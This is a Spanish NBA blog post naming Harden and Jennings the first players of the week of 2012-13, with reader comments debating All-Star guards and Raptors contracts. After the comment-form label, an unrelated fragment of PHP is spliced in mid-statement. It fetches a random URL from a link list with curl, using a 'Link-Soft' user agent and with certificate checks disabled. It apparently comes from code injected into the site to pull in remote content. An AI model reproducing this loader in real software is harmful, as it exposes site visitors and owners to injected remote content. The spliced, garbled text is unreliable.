Harden y Jennings, primeros jugadores de la semana 2012-2013

05 de November de 2012 por MagicJohnson32

La NBA ha anunciado a los primeros ‘jugadores de la semana’ de la temporada 2012-2013. En la Conferecia Oeste el elegido ha sido, por supuesto, James Harden, demoledor en su estreno con los Rockets y máximo anotador de la NBA en esta semana inicial con 35,3 puntos por partido. En el Este, el honor ha correspondido a Brandon Jennings, autor en las dos victorias de los Bucks de 17 puntos, 13 asistencias y 4 robos de media, además de un polémico buzzer beater. Recordamos algunos highlights de Harden y Jennings:


Comenta

11 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Puf, no había visto el buzzer de Jennings.
    Asesino

      Citar

  2. MagicJohnson32 dice:
    #2

    HisRoyalAirness:
    Puf, no había visto el buzzer de Jennings.
    Asesino

    Sí, es criminal… lo que tarda en empezar a correr el reloj cuando Jennings recibe, jeje. Sobre todo en la última toma, desde atrás, se ve cómo recibe, se cuadra y salta mientras el reloj sigue en 0.7.

    Ojo, aun así, canastón.

      Citar

  3. Melo15 dice:
    #3

    Tampoco tarda tanto, ademas Jennings va sobrado.
    Creo que esta va a ser la tmporada en la que Jennings se va a consolidar, ha mejoradabla direccion y ayer contra los Cavs se le vio activo en la defensa a Irving.
    Este año la lucha por el all-star en la posicion de Guard sera bestial: Rondo, Williams, Wade, Lowry, Jennings, Ellis, DeRozan, Holiday…
    Yo apuesto por Rondo, Williams, Wade, Holiday y Jennings.

      Citar

  4. MagicJohnson32 dice:
    #4

    ¿DeRozan?

      Citar

  5. melo15 dice:
    #5

    MagicJohnson32:
    ¿DeRozan?

    Si,Si yo lo veo clarisimo. ha empezado muy bien, y ha mejorado su tiro exterior que le dara mas opciones en ataque , esta con confianza y creo que va a estar entre los 19pp y con los Raptors mas o menos en PO.

      Citar

  6. Sancho88 dice:
    #6

    LaZorra all star? Por encima de mi cadáver

      Citar

  7. MagicJohnson32 dice:
    #7

    Ya sabía yo que Sancho iba a salir al cruce, jeje.

    DeRozan no aporta nada más que anotación, y ni siquiera en una cantidad y con unos porcentajes que le saquen de la vulgaridad. No es cuestión de que mejore su tiro exterior (que ya veremos, y sólo faltaba que no mejorase sus míseros porcentajes), es que tiene que mejorar en todo para que siquiera le tengan en cuenta.

    De hecho, su renovación por 40 kilos me parece una de las cosas más inexplicables de los últimos años.

      Citar

  8. txusma dice:
    #8

    MagicJohnson32:

    De hecho, su renovación por 40 kilos me parece una de las cosas más inexplicables de los últimos años.

    Hablas del equipo que renovó a Turkoglu o Bargnani por auténticos pastizales.

      Citar

  9. MagicJohnson32 dice:
    #9

    txusma: Hablas del equipo que renovó a Turkoglu o Bargnani por auténticos pastizales.

    Y el que le dio a Landry Fields un contrato que ni soñaba en sus noches más locas, jaja.

      Citar

  10. Toni dice:
    #10

    Pues mira que las noches locas con la novia del bueno de Landry… @elainealden Desde luego que este chico tiene una poquita de suerte en la vida. Siento que sea un poco offtopic, pero no podía resistirme a ponerlo jaja.

    Por cierto, ha empezado el puente aéreo de piropos entre Oklahoma y Houston, promete apasionantes episodios.

      Citar

  11. melo15 dice:
    #11

    Txusma, yo no considero escandalosas esas renovaciones, Turkoglu venia de salirse en los Magic y realmente se merecia un buen contrato, y Bargnani estuvo cerca de ser All-star el año pasado asi que tampoco me parece que Colangelo este haciendo una mala gestion, cuantos equipos se reconstruyen es 3 años? Porque los Raptors han pasado de estar en el pozo de la liga cuando perdieron a Bosh a estar luchando por los PO y con una base para el futuro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>